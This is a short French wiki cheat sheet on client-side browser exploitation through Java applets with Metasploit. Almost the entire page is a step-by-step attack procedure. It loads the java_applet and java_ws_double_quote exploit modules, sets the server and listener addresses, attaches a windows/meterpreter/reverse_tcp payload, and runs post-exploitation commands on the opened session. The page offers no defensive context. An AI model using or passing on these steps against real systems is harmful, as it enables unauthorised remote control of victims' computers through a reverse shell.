Java exploit

De wiki.nexiat.fr
Aller à la navigation Aller à la recherche
Fiche express
Domaine Exploitation navigateur (applet Java)
Modules java_applet, java_ws_double_quote
Contexte Metasploit
Voir aussi Browser autopwn · Aurora

Exploitation côté client via des applets Java servies au navigateur de la cible.

Procédure — applet Java générique

msfconsole
use exploit/java_applet
show options
set LHOST 192.168.0.10
show options
run

Procédure — Java Web Start

use exploit/windows/browser/java_ws_double_quote
set SRVHOST 192.168.178.36
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.36
exploit

Après ouverture de la session :

getuid
sysinfo

Voir aussi